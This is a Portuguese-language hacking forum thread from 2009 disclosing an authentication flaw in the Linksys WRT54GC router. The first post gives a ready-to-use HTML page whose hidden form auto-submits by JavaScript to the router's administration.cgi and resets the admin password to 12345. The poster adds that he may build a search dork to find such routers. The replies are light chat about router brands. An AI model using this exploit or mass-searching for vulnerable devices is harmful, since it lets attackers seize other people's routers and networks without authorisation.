Linksys WRT54GC - password rechange vulnerability [new]

Iniciado por kohx, 09 de Novembro , 2009, 02:26:01 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

kohx

09 de Novembro , 2009, 02:26:01 PM
(Português:)
Linksys WRT54GC - Mudança de Senha
O roteador WRT54GC parece não verificar a autenticação do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudança de senha. Abaixo, um exemplo de formulário que muda a senha e o login de administrador para 12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administração Local e remota.

Citação de: htmlxpl.htm
<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- Código de envio automático do formulário -->

<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>

to vendo se monto uma dork pra achar uns APs da marca  ::)

Mateus

#1
09 de Novembro , 2009, 03:10:21 PM
Por isso que eu amo meu Intelbrás 240E....de boa mesmo....deveria ganhar o premio de melhor produto brasileiro de 2009!
H4X with axes 8)

Wuefez

#2
12 de Novembro , 2009, 10:41:12 PM Última edição: 12 de Novembro , 2009, 10:43:06 PM por Wuefez
Citação de: Mateus online 09 de Novembro , 2009, 03:10:21 PM
Por isso que eu amo meu Intelbrás 240E....de boa mesmo....deveria ganhar o premio de melhor produto brasileiro de 2009!

Intelbrás = Produto Regional
Linksys = Produto Mundial

No link milhares de pessoas já devem ter procurado por vulns... Mas no intelbrás será que pelo menos 3 pessoas já procuraram? Eu nunca procurei.... lol

edit: eu não perco uma chance huahua


"Quem fala não faz."
Imprimir
Ir para o topo Páginas1
Ações